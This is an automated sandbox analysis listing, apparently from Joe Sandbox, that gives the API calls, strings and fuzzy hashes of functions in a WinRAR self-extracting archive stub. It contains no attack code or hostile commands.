Part of subcall function 0072A335: SHGetMalloc.SHELL32(00758430), ref: 0072A38F

Part of subcall function 007213B3: GetCPInfo.KERNEL32(00000000,?), ref: 007213C4
Part of subcall function 007213B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 007213D8

GetCommandLineW.KERNEL32 ref: 0072D61C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0072D643
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0072D654
UnmapViewOfFile.KERNEL32(00000000), ref: 0072D68E

Part of subcall function 0072D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0072D29D
Part of subcall function 0072D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0072D2D9

CloseHandle.KERNEL32(00000000), ref: 0072D697
GetModuleFileNameW.KERNEL32(00000000,0076DC90,00000800), ref: 0072D6B2
SetEnvironmentVariableW.KERNEL32(sfxname,0076DC90), ref: 0072D6BE
GetLocalTime.KERNEL32(?), ref: 0072D6C9
_swprintf.LIBCMT ref: 0072D708
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0072D71A
GetModuleHandleW.KERNEL32(00000000), ref: 0072D721
LoadIconW.USER32(00000000,00000064), ref: 0072D738
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0072D789
Sleep.KERNEL32(?), ref: 0072D7B7
DeleteObject.GDI32 ref: 0072D7F0
DeleteObject.GDI32(?), ref: 0072D800
CloseHandle.KERNEL32 ref: 0072D843

Strings

sfxstime, xrefs: 0072D715
STARTDLG, xrefs: 0072D77E
sfxname, xrefs: 0072D6B9
winrarsfxmappingfile.tmp, xrefs: 0072D637
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0072D6F9
xjv, xrefs: 0072D7CB
C:\Users\user\Desktop, xrefs: 0072D5E9

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xjv
API String ID: 788466649-2817218082
Opcode ID: fea03450350d8186a9e5a1a568c7cccffff38e3482d5492fd17f74d8909120d7
Instruction ID: f71f8766713f186edc940aa4c61f67b52808d13b79dfbc1ffa11fa260a4189c7
Opcode Fuzzy Hash: fea03450350d8186a9e5a1a568c7cccffff38e3482d5492fd17f74d8909120d7
Instruction Fuzzy Hash: B261D6B59043A0EFD330AF65EC49F6A37A8AB45741F044429F949921A2EBBC8D44C776

Uniqueness

Uniqueness Score: -1.00%

Function 00729E1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(0072AE4D,PNG,?,?,?,0072AE4D,00000066), ref: 00729E2E
SizeofResource.KERNEL32(00000000,00000000,?,?,?,0072AE4D,00000066), ref: 00729E46
LoadResource.KERNEL32(00000000,?,?,?,0072AE4D,00000066), ref: 00729E59
LockResource.KERNEL32(00000000,?,?,?,0072AE4D,00000066), ref: 00729E64
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0072AE4D,00000066), ref: 00729E82
GlobalLock.KERNEL32(00000000,?,?,?,?,?,0072AE4D,00000066), ref: 00729E93
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00729EFC
GlobalUnlock.KERNEL32(00000000), ref: 00729F1B
GlobalFree.KERNEL32(00000000), ref: 00729F22

Strings

PNG, xrefs: 00729E1F

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
String ID: PNG
API String ID: 4097654274-364855578
Opcode ID: 53de4dd541085d60828e667fdbc85ac2ac8f1d72dfa125d6306e933f12563e09
Instruction ID: 2aa4d11b9dfefa3f2b0d778a17ab008436512de811dc4b267587818e4a8d66b9
Opcode Fuzzy Hash: 53de4dd541085d60828e667fdbc85ac2ac8f1d72dfa125d6306e933f12563e09
Instruction Fuzzy Hash: 8A31E475604716AFC7109F21EC48D5BBBADFF86751F188529F906D2260DB79DC00CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 0071A5F4 Relevance: 7.6, APIs: 5, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0071A4EF,000000FF,?,?), ref: 0071A628
FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0071A4EF,000000FF,?,?), ref: 0071A65E
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0071A4EF,000000FF,?,?), ref: 0071A66A
FindNextFileW.KERNEL32(?,?,?,?,?,?,0071A4EF,000000FF,?,?), ref: 0071A692
GetLastError.KERNEL32(?,?,?,?,0071A4EF,000000FF,?,?), ref: 0071A69E

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: d2faaeb70c5293b1adf667bb3e11f0d7e1663b1be1deb5bdd7e2c43b4e2b0b1b
Instruction ID: 80d19c02c33aff2022854258a268185aa0b075c446a3bfdf12fe49f9df84f08f
Opcode Fuzzy Hash: d2faaeb70c5293b1adf667bb3e11f0d7e1663b1be1deb5bdd7e2c43b4e2b0b1b
Instruction Fuzzy Hash: 66419476605341EFC320EF68D884ADAF7F8BF49340F044A2EF599D3251D738A9948B92

Uniqueness

Uniqueness Score: -1.00%

Function 0073753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00737513,00000000,0074BAD8,0000000C,0073766A,00000000,00000002,00000000), ref: 0073755E
TerminateProcess.KERNEL32(00000000,?,00737513,00000000,0074BAD8,0000000C,0073766A,00000000,00000002,00000000), ref: 00737565
ExitProcess.KERNEL32 ref: 00737577

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5c7a3911888b6cf4f06f24e83b309329e51efad34b27563c0451f8857603f37c
Instruction ID: 7df91c79116f3193eaab45d3701ff7adcc5208a15dedf805dd6f6fe99ed117eb
Opcode Fuzzy Hash: 5c7a3911888b6cf4f06f24e83b309329e51efad34b27563c0451f8857603f37c
Instruction Fuzzy Hash: 4AE0B675004948EBDF29AF64DD0DA493B6AEF42741F10C415F9498B233CB3EDE52CA54

Uniqueness

Uniqueness Score: -1.00%

Function 0071857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00718580
_memcmp.LIBVCRUNTIME ref: 00718A08

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: 2e553ee148e06dc43b9a2a9124c23a815961699888fe9ef096a392f3ff843ad6
Instruction ID: 431c1548d7dbf873017feaecd8ae3b7a3166f96dca1850c24f412fc26c02ebd8
Opcode Fuzzy Hash: 2e553ee148e06dc43b9a2a9124c23a815961699888fe9ef096a392f3ff843ad6
Instruction Fuzzy Hash: 10822A70904245EEDF25DB68C895BFAB7B9BF05300F0841B9ED499B1C2DB385AC9CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0072AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0072AEE5

Part of subcall function 0071130B: GetDlgItem.USER32(00000000,00003021), ref: 0071134F
Part of subcall function 0071130B: SetWindowTextW.USER32(00000000,007435B4), ref: 00711365

Strings

"%s"%s, xrefs: 0072B423
STARTDLG, xrefs: 0072AF04
LICENSEDLG, xrefs: 0072B771
__tmp_rar_sfx_access_check_%u, xrefs: 0072B1CB
winrarsfxmappingfile.tmp, xrefs: 0072B2BC
-el -s2 "-d%s" "-sp%s", xrefs: 0072B281
@, xrefs: 0072B2A7
C:\Users\user\Desktop, xrefs: 0072B2DF
<, xrefs: 0072B29A

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-8108337
Opcode ID: 5ff1ac231b76654fae1cd57c54d28a2d5a9fb3b9bdeb4b4d00447947ee1deb16
Instruction ID: 262724018f0a2e8f2cbfd455a7b8cfa55834204eccada631f0e961472b75067b
Opcode Fuzzy Hash: 5ff1ac231b76654fae1cd57c54d28a2d5a9fb3b9bdeb4b4d00447947ee1deb16
Instruction Fuzzy Hash: A042D4B09443A4BFEB219BB4AC4AFEE377CAB01741F008155F605A61D2CBBC4D85CB66

Uniqueness

Uniqueness Score: -1.00%

Function 007200CF Relevance: 98.3, APIs: 22, Strings: 34, Instructions: 317
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 007200E4
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007200F6
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00720127
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 007203D4
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007203F0
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00720402
ReadFile.KERNEL32(00000000,?,00007FFE,00743BA4,00000000), ref: 00720421
CloseHandle.KERNEL32(00000000), ref: 00720479
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0072048F
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 007204E7
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00720510
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0072054A

Part of subcall function 00720085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007200A0
Part of subcall function 00720085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0071EB86,Crypt32.dll,00000000,0071EC0A,?,?,0071EBEC,?,?,?), ref: 007200C2

_swprintf.LIBCMT ref: 007205BE
_swprintf.LIBCMT ref: 0072060A

Part of subcall function 0071400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0071401D

AllocConsole.KERNEL32 ref: 00720612
GetCurrentProcessId.KERNEL32 ref: 0072061C
AttachConsole.KERNEL32(00000000), ref: 00720623
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00720649
WriteConsoleW.KERNEL32(00000000), ref: 00720650
Sleep.KERNEL32(00002710), ref: 0072065B
FreeConsole.KERNEL32 ref: 00720661
ExitProcess.KERNEL32 ref: 00720669

Strings

4=t, xrefs: 007201EC
\At, xrefs: 007203A7
DAt, xrefs: 0072039C
<?t, xrefs: 007202B5
kernel32, xrefs: 007200DD
@>t, xrefs: 00720247
T?t, xrefs: 007202C0
p>t, xrefs: 0072025D
<t, xrefs: 0072018C
l<t, xrefs: 0072055C
0At, xrefs: 00720391
SetDllDirectoryW, xrefs: 007200F0
(>t, xrefs: 0072023C
T;t, xrefs: 00720154
(@t, xrefs: 00720323
dwmapi.dll, xrefs: 00720581
uxtheme.dll, xrefs: 0072058B
?t, xrefs: 007202AA
@@t, xrefs: 0072032E
X>t, xrefs: 00720252
x=t, xrefs: 00720204
p@t, xrefs: 00720344
|<t, xrefs: 007201AC
DXGIDebug.dll, xrefs: 00720169, 007204D3
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 007205F8
>t, xrefs: 00720289
8<t, xrefs: 00720194
X@t, xrefs: 00720339
`=t, xrefs: 007201FC
D=t, xrefs: 007201F4
SetDefaultDllDirectories, xrefs: 00720121
P<t, xrefs: 0072019C
?t, xrefs: 00720302
p?t, xrefs: 007202CB

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: <t$ ?t$(>t$(@t$0At$4=t$8<t$<?t$@>t$@@t$D=t$DAt$DXGIDebug.dll$P<t$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;t$T?t$X>t$X@t$\At$`=t$dwmapi.dll$kernel32$l<t$p>t$p?t$p@t$uxtheme.dll$x=t$|<t$>t$?t
API String ID: 1201351596-2675666711
Opcode ID: e083394075c63f59f7baefc18579cd4b2ac8709267c0eff125f220f8b3b4d6e2
Instruction ID: cc03e7332890e9b886f03bc1acfe7b80779c3de3d252011e8ca298799d964d32
Opcode Fuzzy Hash: e083394075c63f59f7baefc18579cd4b2ac8709267c0eff125f220f8b3b4d6e2
Instruction Fuzzy Hash: EBD171B1508394ABD330DF60D849B9FBAE8FF85704F10492DF69C96191D7BC86488FA6

Uniqueness

Uniqueness Score: -1.00%

Function 0072BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0072BDFA

Part of subcall function 0072AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0072AAFE

SetWindowTextW.USER32(?,?), ref: 0072C127
_wcsrchr.LIBVCRUNTIME ref: 0072C2B1
GetDlgItem.USER32(?,00000066), ref: 0072C2EC
SetWindowTextW.USER32(00000000,?), ref: 0072C2FC
SendMessageW.USER32(00000000,00000143,00000000,0075A472), ref: 0072C30A
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0072C335

Strings

<br>, xrefs: 0072C08A
Software\Microsoft\Windows\CurrentVersion, xrefs: 0072C1D0
%s.%d.tmp, xrefs: 0072BFF6
ProgramFilesDir, xrefs: 0072C1FB

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3564274579-312220925
Opcode ID: 6990dfd72db85acd49d563458fa3256c6fde06828150ba7b520fb2cee2e5e655
Instruction ID: a8a3b187f62938d17bad3d25c58786ae8112ad2d7cc28e8640fae56b9cb4b90f
Opcode Fuzzy Hash: 6990dfd72db85acd49d563458fa3256c6fde06828150ba7b520fb2cee2e5e655
Instruction Fuzzy Hash: 3DE16376D00528EADB25DBA4EC49DEF77BCAF18350F1040A6F609E3051EB789B84CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0071D341 Relevance: 25.1, APIs: 4, Strings: 10, Instructions: 555
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0071D346
_wcschr.LIBVCRUNTIME ref: 0071D367
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0071D328,?), ref: 0071D382
__fprintf_l.LIBCMT ref: 0071D873

Part of subcall function 0072137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0071B652,00000000,?,?,?,00010472), ref: 00721396

Strings

*messages***, xrefs: 0071D4D3
$%s:, xrefs: 0071D856
*messages***, xrefs: 0071D49A
a, xrefs: 0071D4EF
RTL, xrefs: 0071D838
@%s:, xrefs: 0071D85D, 0071D869
R, xrefs: 0071D4E5
$9t, xrefs: 0071D6AF
,, xrefs: 0071D8AE
, xrefs: 0071D67A

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$$9t$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 4184910265-1787243816
Opcode ID: 9f3c0143cd78317d5d57accdd3ad529d181d9e108356cf922eb280bb0f6ba4bd
Instruction ID: a56904bfaae916e6db9b5a034c331ae4277ab6ff8a296cb22abf3afcf2dbdc45
Opcode Fuzzy Hash: 9f3c0143cd78317d5d57accdd3ad529d181d9e108356cf922eb280bb0f6ba4bd
Instruction Fuzzy Hash: F412C1B1A00219DADF34DFA8DC95AEEB7B5EF04700F104569E505A71D2EB78AE81CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0072CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0072AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0072AC85
Part of subcall function 0072AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0072AC96
Part of subcall function 0072AC74: IsDialogMessageW.USER32(00010472,?), ref: 0072ACAA
Part of subcall function 0072AC74: TranslateMessage.USER32(?), ref: 0072ACB8
Part of subcall function 0072AC74: DispatchMessageW.USER32(?), ref: 0072ACC2

GetDlgItem.USER32(00000068,0076ECB0), ref: 0072CB6E
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0072A632,00000001,?,?,0072AECB,00744F88,0076ECB0), ref: 0072CB96
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0072CBA1
SendMessageW.USER32(00000000,000000C2,00000000,007435B4), ref: 0072CBAF
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0072CBC5
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0072CBDF
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0072CC23
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0072CC31
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0072CC40
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0072CC67
SendMessageW.USER32(00000000,000000C2,00000000,0074431C), ref: 0072CC76

Strings

\, xrefs: 0072CBCF

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: bd3bce2a865cf5f6378ed49d7f5ae19d1013239d67874a82aa0286a78986a372
Instruction ID: 0693beed28c4ea9e36426d875cff7f8e9526a8e08c0f0e629417f03c87ae52c8
Opcode Fuzzy Hash: bd3bce2a865cf5f6378ed49d7f5ae19d1013239d67874a82aa0286a78986a372
Instruction Fuzzy Hash: 7331F371145341AFD301DF20EC8AFAF7FACEB82745F004908FA6496192DB684945C77A

Uniqueness

Uniqueness Score: -1.00%

Function 0072CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(?), ref: 0072CF54
ShowWindow.USER32(?,00000000), ref: 0072CF93
GetExitCodeProcess.KERNEL32(?,?), ref: 0072CFCF
CloseHandle.KERNEL32(?), ref: 0072CFF5
ShowWindow.USER32(?,00000001), ref: 0072D084

Part of subcall function 007217AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0071BB05,00000000,.exe,?,?,00000800,?,?,007285DF,?), ref: 007217C2

Strings

, xrefs: 0072CEA2
.inf, xrefs: 0072CF10
.exe, xrefs: 0072CFFF

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: 9341ac5cd5db3268dc19635d5baad49cedf51c124b36c77204b5f5291174efab
Instruction ID: 722d2d97f349e42bf26cebcfd8903cb6ebd8b47b0fbd48c19cbbf6d165ef1f98
Opcode Fuzzy Hash: 9341ac5cd5db3268dc19635d5baad49cedf51c124b36c77204b5f5291174efab
Instruction Fuzzy Hash: A16104718043A09BD7329F24E9046AFBBE9EF95300F048819F5C597261D7BD8D85CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0073A058 Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00734E35,00734E35,?,?,?,0073A2A9,00000001,00000001,3FE85006), ref: 0073A0B2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0073A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0073A138
